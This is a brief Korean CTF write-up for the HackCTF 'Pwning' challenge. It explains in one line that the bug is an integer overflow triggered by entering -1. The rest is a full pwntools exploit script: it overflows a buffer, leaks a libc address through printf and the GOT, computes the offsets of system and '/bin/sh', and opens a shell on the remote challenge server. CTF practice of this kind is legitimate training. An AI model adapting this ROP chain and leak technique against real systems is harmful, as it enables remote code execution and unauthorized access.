HackCTF - Pwning

 

 

정수 오버플로우를 이용한 문제

 

-1를 주고 rop를 진행하면 된다

 

from pwn import *

r = remote('ctf.j0n9hyun.xyz', 3019)
e = ELF('./pwning', checksec=False)
# context.log_level = 'debug'

r.sendlineafter('? ','-1')
r.recvuntil('!\n')

payload = 'A'*48
payload += p32(e.plt['printf'])
payload += p32(0x080484e1)
payload += p32(e.got['atoi'])
payload += p32(e.sym['main'])

r.sendline(payload)

r.recvuntil('\n')
leak = u32(r.recv(4))
print(hex(leak))

libc_base = leak - 0x02d050
system = libc_base + 	0x03a940
binsh = libc_base + 0x15902b

payload = 'A'*48
payload += p32(system)
payload += 'AAAA'
payload += p32(binsh)

r.sendlineafter('? ','-1')
r.sendline(payload)

r.interactive()